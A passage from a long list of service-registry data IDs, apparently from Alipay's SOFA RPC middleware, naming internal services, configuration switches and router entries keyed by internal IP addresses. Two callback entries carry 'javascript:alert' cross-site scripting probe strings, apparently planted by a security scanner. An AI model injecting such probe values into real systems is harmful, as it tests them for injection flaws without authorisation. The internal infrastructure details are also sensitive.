#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.identity.StsActorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.ConfigOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.reSendGotoneMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcaudit.core.service.common.SysParamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicDistributionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.SecuAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.core.precalulate.service.DataViewStatisticsServer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.domain.QueryCategory:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.extension.WorkbenchEffluxService:1.0:contentlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.alipayrelation.AlipayUserSportQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.HbaseDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:basement#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.250.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.homeShowCompleteNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:javascript:alert('antscanGIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZDFMRWGG3T2MQ------')@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:approveDpcTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0:MYBKC1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.log.InsightDashboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openUnifiedLimitCheckStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZDATAQUERY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tab.common.service.facade.SwitchToGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.tabProductCardGroupOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insscenemarket.common.facade.InsMktStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqm.emer.EmerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:pledgecoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:ficcbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.SecuInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.overseaprod.common.service.tourpass.facade.api.TourPassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditbenefit.memberrights.trigger@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.aliapy.boot.test.sofarpc.starter.demo.ConfigDemoService:1.0:service-filter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insautomarket.common.facade.cicada.AutoMktCicadaDataFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.UserActivityAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.ai.InternationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillProductCallbackFacade:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.preferTaskKeys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yuyan.core.BaaSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.open.product.ProductLineMetadataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:transfercenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.query.ExposureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.integration.promox.PromoxClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.liquidity.LiquidityInstManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.transformer.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.dapply.ReassignReactDeliveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:opsconfreg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.SysParaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenPlatformOperatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.FinoutfluxQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.31.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdt.da.common.service.facade.api.MerchantIncomeReportRightsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.ecoqltprod.EcoqltprodFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.0.0.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.benefitprod.common.service.mng.facade.CardBaseInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.InstantExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.CampLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_WX_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.biz.service.impl.decision.alarm.RiskReporter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:virtualprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoCarInfoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.TestCaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:name@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.finpwm.finpwmXTradeSlaveDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_HSF_CALLBACK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:finauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminIsvContractAuditServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.match.api.MatchAppointmentStatModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdelivery.common.service.facade.api.DeliveryConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.ReadMeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.itemcore.common.service.facade.ItemGZoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.ReplayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.eworkcard.AlipayQueryEworkCardDataByAsynService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.plan.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.assets.AssetsServiceGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.service.batch.bwfb.api.bg.WithholdingBGManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.data.QueryFacadeService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfiprod.common.service.facade.rfm.user.service.RfmInvestorCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecommunity.common.service.facade.CommunityAuthManageFacade:1.0:mobilecommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","ddsconsole@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.relation.RelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.IndustrycoreProductPartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbbusinessprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.manage.facade.api.CacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.MetadataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iriskmerchant.common.service.integration.deepinsight.DeepInsightClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","frscenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:grmcore_program_overrule_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@gmodelcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.agap.service.facade.mng.api.BizTypeOutRelationManageService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_OPC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promohelix.common.service.facade.api.sci.SciTaskGroupRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.auditprod.service.riskctrl.drm.RiskCtrlConfigDRM.weakCtrlTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininsightcore.common.service.facade.account.api.AccountAimManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcenter.common.service.facade.buservice.JobQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.sobexchange.SobExchangePhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:zmopenapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.ChildQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1212#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.ContractShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:reconExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.facade.api.instFileTemplate.InstFileTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.matchcenter.facade.ProductSuspendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.clientLoadTestStoreType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_onestop_labelFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcsc.common.service.facade.holographic.FactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.TagMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.biz.sign.facade.SignTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:CUSTPERMA@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.hook.HookUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:consumeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdrmdata.pub.server.url@DRM#@#DEFAULT_INSTANCE_ID#@#DRM","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:antsecurity_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.provider.compensate.CompensateTaskService:1.0:xviewconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:javascript:alert('antscan86842598-80102053-uniqueId-105003014')@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.compile.ScriptCompiler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscsalipay.common.service.facade.scene.AgdsSceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.sfa.api.SfatransBatchTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insapportion.apportion.service.ApportionOverdueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.ManagedMQServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mdeviceprod.common.service.facade.query.DeviceCustomerRelationsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.lot.AssetIotAssignRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stepflow.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:erecon@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingGroupChatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.upgrade.PublishUpgradeApi:1.0:dppublishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.ops.api.OpSnapshotServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isdsp.common.service.facade.SceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.PublicMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductCoreSearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finscprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:msgopprodTemplateProcess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:myddsserviceonline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.auth.AuthFieldManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isecuritycore.service.query.facade.BlackNameListService:1.0:tourpass@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizrecon.facade.ext.QueryInstDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmshmp-pcsworkbench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.DeviceViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iexchange.service.facade.api.query.ExchangeTrialService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alitrip.tripbp.client.award.GeneralApplyHsfService:1.0:1.0.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.OpenFormManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.content.article.api.ArticleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.PushWindowQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:exriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antbuservice:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcommerceprod.common.service.facade.CampusInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.tabServiceCrowdMatchEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstrategy.common.service.facade.portfolio.PortfolioApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-sccore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.geoip.CommonIPRepositoryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.cicada.feedback.FeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.CampBaseInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundQuotationGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_INSTTRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.service.integration.baoxiancore.BaoxianCoreInsEndorseFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.process.CpInfoProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.AntispamSecCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.ResearchDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.warning.WarningServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.guid.ProtectGuidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:tradeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.canAccessAppNamesStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.182.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.core.ranking.propertygen.EntityPropertyGenerator:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccdc.common.service.facade.WapCardInfoWriteService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.unitradeprod.common.facade.service.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_192.168.199.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.stopProfitRedeemMsgBugFixJsonSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_dchainabsprod_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MRMCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.blockUserLevels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-zplayback-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finormweb.service.facade.RiskSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.250.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicreateweb.api.Insight:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.222.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.141.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthMobileEwcProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.246.17#